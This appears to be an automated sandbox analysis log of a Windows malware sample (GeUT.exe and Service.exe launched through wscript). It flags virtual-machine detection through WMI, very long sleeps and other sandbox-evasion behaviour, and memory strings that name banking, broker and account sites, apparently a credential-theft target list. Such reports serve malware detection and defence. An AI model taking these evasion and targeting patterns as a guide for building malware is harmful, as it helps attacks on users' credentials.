Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2A50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2AD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 4AD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 1230000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 3000000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2B20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2C80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 4C80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 17F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 3380000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 31A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 1070000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2D60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 4D60000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2B80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2DB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2B80000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2E20000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 3030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 5030000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: F30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 29D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 49D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2DB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 4DB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2650000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 27C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 47C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2960000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: DA0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2740000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2910000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 4910000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: AD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2560000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: B20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2D60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2FB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2DD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: C50000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 29A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: F30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 830000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2270000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2090000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: B60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2840000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 27B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 4930000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: A40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2520000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2390000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 1290000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2D30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Memory allocated: 2AB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 820000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2720000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2430000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 20E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 22E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 42E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: F60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2730000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 4730000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 740000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2350000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 21B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 15F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 3100000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 15F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: C80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 27E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Service.exe Memory allocated: 2610000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Window / User API: threadDelayed 9785 Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1109
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 2940 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6816 Thread sleep time: -30437127721620741s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5280 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5508 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5848 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6860 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6336 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 2156 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 332 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1988 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1928 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 3020 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4044 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1568 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 4500 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 3572 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 6364 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 5932 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 3688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe TID: 1528 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 7076 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 1000 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 5944 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 4536 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 6452 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Service.exe TID: 2644 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5284 Thread sleep count: 1109 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5284 Thread sleep count: 213 > 30
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\Service.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Service.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: GeUT.exe, 00000005.00000002.2741664040.0000000001287000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: discord.comVMware20,11696494690f
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: AMC password management pageVMware20,11696494690
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: outlook.office.comVMware20,11696494690s
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: wscript.exe, 00000000.00000002.1479116437.000002BDE16E0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: wscript.exe, 00000000.00000002.1479202696.000002BDE1727000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1468880158.000002BDE1727000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000003.00000003.1507105229.000001EF34FA3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: tmp5F83.tmp.dat.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
